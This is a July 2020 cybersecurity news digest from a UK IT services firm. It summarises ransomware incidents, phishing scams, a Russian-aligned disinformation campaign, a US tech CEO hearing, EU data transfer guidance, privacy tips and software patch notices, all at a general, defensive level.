FFT news digest July 31 2020

Ransomware

There are mixed messages about the risk of ransomware, with some reports saying this year has seen a decline in successful attacks, but our view is that it remains a clear, present and increasing danger. The latest high-profile victim is GPS and fitness company, Garmin, which is now recovering from "a cyber-attack that encrypted" some of its systems. (At the time of writing, some services remain limited.) Ransomware is an easy way for criminals to make money and every organisation is likely to experience an attempted attack at some stage. ZDNet has a blow-by-blow account of one incident which affected a food and drink manufacturer. The key lesson is that this attack was not particularly sophisticated. It used the tried and tested weapon of a Microsoft Word document labelled as an invoice. Once downloaded, the document executed a PowerShell command. Ordinary users don't need to run such commands and disabling PowerShell would have stopped the attack in its tracks. As always, look after the basics and the basics will look after you.

Scumwatch

Skype: Attack uses an automated invoice notification with a link to the supposed bill. Clicking on the link opens a fake Microsoft sign-in page in a bid to steal credentials. Abnormal Security

TV licence: Scammers aren't about to pass up the ideal opportunity presented by the end of free licences for over-75s. There's a blizzard of fake emails doing the rounds and some elderly people have lost tens of thousands of pounds as a result of falling for them. Moneywise

Netflix: Attempts to steal payment card info and credentials begin by redirecting users to a functioning CAPTCHA page to bypass email security controls. (CAPTCHAs are those irritating things that supposedly prove we're human). Armorblox

PayPal: Upsurge in fake PayPal emails saying the recipient's account has been "limited" as a result of a policy violation. Action Fraud

Emotet: After five months of slumber, the malicious software botnet has re-emerged with some clever tricks, including using stolen email attachments to make its messages look more authentic. Basic precautions are essential to reduce the risk of being affected. (Botnets are networks of compromised devices used for nefarious purposes.) Bleeping Computer

Mac malware: North Korea is blamed for four distinct families of malicious software designed to attack macOS devices. Researchers say those responsible are "deeply invested in writing custom malware for Apple's platform". SentinelOne

Android: A slew of malicious photo apps flood devices with random ads rather than doing what they promise. They also evade detection by making their icons disappear from the home screen. As always, we advise extreme caution when installing apps from the Google Play Store. White Ops

Top Ten: UK Finance rounds up the top COVID-19 related scams, including some of the above as well as fake council tax reductions and test and trace notifications. Action Fraud

Disinfo dissected

Analysis of a three-year campaign provides a detailed view of the tactics used to spread disinformation. Dubbed Ghostwriter, the campaign analysed by FireEye mainly targets audiences in Lithuania, Latvia and Poland and is aligned to Russian interests. Compromised websites and spoofed email accounts were used to distribute fake content with anti-NATO and anti-US themes. FireEye says at least 14 fake online identities were created to pose as journalists and analysts in a "concerted and ongoing influence campaign". A variety of tactics have been used, but each operation starts by creating a falsified narrative and fabricated content, including made-up quotes and modified images. In many cases, compromised websites, including news outlets, were exploited to publish fake news or documentation which in some cases replaced genuine content. This campaign targeted Eastern Europe but, as FireEye warns, it could easily be repurposed in the run-up to crucial US elections.

Tech titans testify

You're a lawmaker and you have the leaders of four of the most powerful tech companies in the world in front of you. What do you ask them? Well, if you're Republican Congressman, Greg Steube, from Florida, you take the chance to ask (repeatedly) why your fundraising emails have ended up as spam. This week's House Judiciary Committee hearing was designed to put the CEOs of Amazon, Facebook, Google and Apple on the spot. It did occasionally manage to do that by bringing up anti-competitive data use (Amazon), anti-competitive acquisitions (Facebook), anti-competitive app policies (Apple), and anti-competitive search algorithms (Google). But the hearing (over 5 hours of it) was full of sound, littered with interruptions and and limited on substance. It was the culmination of a 13-month investigation into the tech giants and a report is due to be released soon. It's just one of multiple probes in the US (not to mention reviews in Europe). The road to increased regulation is far from straight, but the tech industry's wild west days are coming to an end.

Transatlantic data transfers

The European Data Protection Board has published guidance following the decision of Europe's top court to overturn a key mechanism underpinning transfers of personal data to the US. The main impact for organisations is the need to carry out a risk assessment "as to whether Standard Contractual Clauses provide enough protection within the local legal framework." The board advises that "the receiver of the data may be able to assist." In reality, the nature of US legislation means any assessment is likely to find there's a problem. The board says it's analysing the Court’s judgment to determine the kind of supplementary measures that could provide sufficient protections. Meanwhile, organisations should "take stock of the international transfers you make and react promptly as guidance and advice becomes available". In the UK, the Information Commissioner's Office has confirmed the board's guidance applies to British controllers and processors. 

Safe sign ups

It's good practice to use a different email address when signing up for online services, but repeatedly creating email accounts is too much trouble for most of us. Using a unique email address means that if an organisation loses your details, then only that address will be affected. To make it easier to do the right thing, Firefox has created a solution called Relay which does the hard work for you. It's currently in beta testing, but signups are being processed relatively quickly. It works by creating an alias that forwards any messages to your normal email address. Together with a password manager, Firefox Relay will definitely enhance your security (it will also identify organisations that have failed to protect your data). One other measure worth considering is to use fake answers when you're asked for memorable information. Just use the password manager to store the made up details.

In brief

Twitter breach: "Phone spear phishing" was responsible for this month's calamitous security failure, according to Twitter's latest update. Targeted messages and calls aimed at stealing credentials are increasingly common and we've seen them used against several high-profile clients. Twitter's account provides a clear outline of how these attacks work.

OKCupid: Multiple security issues could reveal complete profiles, private messages and personal addresses. The value of the data in dating apps is pretty obvious, so it's no surprise the information is catnip to criminals. The problems have been addressed, but frankly these apps should carry a health warning. CheckPoint

CCleaner: Microsoft is now detecting the widely-used Windows utility as a 'potentially unwanted application.' It blames the developer for bundling other applications with the widely-used utility. Bleeping Computer

BCC: The irony. Newsletter platform Substack announced a new privacy policy but did so by copying its email to 500 users (thus revealing the addresses of senior figures in the Trump administration and major corporations among others). The Register

SSDs: As the price of solid state drives falls and usage increases, it's worth keeping in mind that they don't last forever. Research suggests it takes between five and ten years for the storage cells in the memory chips to give up the ghost. CBR

Smartphone personality: The way we use our smartphones can predict four key personality traits. Researchers said openness to experience, conscientiousness, extroversion, and emotional stability could all be estimated. Their paper is interesting and ever so slightly terrifying. PNAS

Updates

Dell: Update to address path traversal vulnerability in PowerEdge servers. Path traversal can enable attackers to view the content of folders that should not be accessible, even to someone who’s logged in as an ordinary user.

Mozilla: Security updates for Firefox, Firefox ESR, and Thunderbird. Vulnerabilities could be exploited to take control of an affected system.

WordPress: Ensure wpDiscuz plugin has been updated to version 7.05 or higher which fixes an issue that could allow code to be executed remotely.

Cisco: Update to address extraordinarily dangerous issue in Data Center Network Manager (DCNM). It could allow anyone on the internet to skip the web interface login and act as an administrator.

SecureDrop: Version 1.50 has security and usability updates.

Tails: As developers put it, version 4.9 fixes "many" security issues.

Routers: Yet more security issues in D-Link and Netgear routers. Some of the devices have reached "end of life" which means no patches are likely. If that's the case, the only safe option is to replace.

Magento: Security updates for Magento Commerce 2 and Magento Open Source 2.

Zimbra: Multiple security fixes in 9.0.0 “Kepler” Patch 5 and 8.8.15 “James Prescott Joule” Patch 12.

Subscribe to receive the digest by email

Full Frame Technology

What we do 
Who we are 
Need to know
Privacy Notice
Website terms

Address

152-160 City Road
London, EC1V 2NX

Contacts
Email: info@fullframetech.com
Phone: +44 (0) 20 3290 2205
Support: +44 (0) 20 3290 2207

Company registration no. 10243217

© Copyright 2021 Full Frame Technology - All Rights Reserved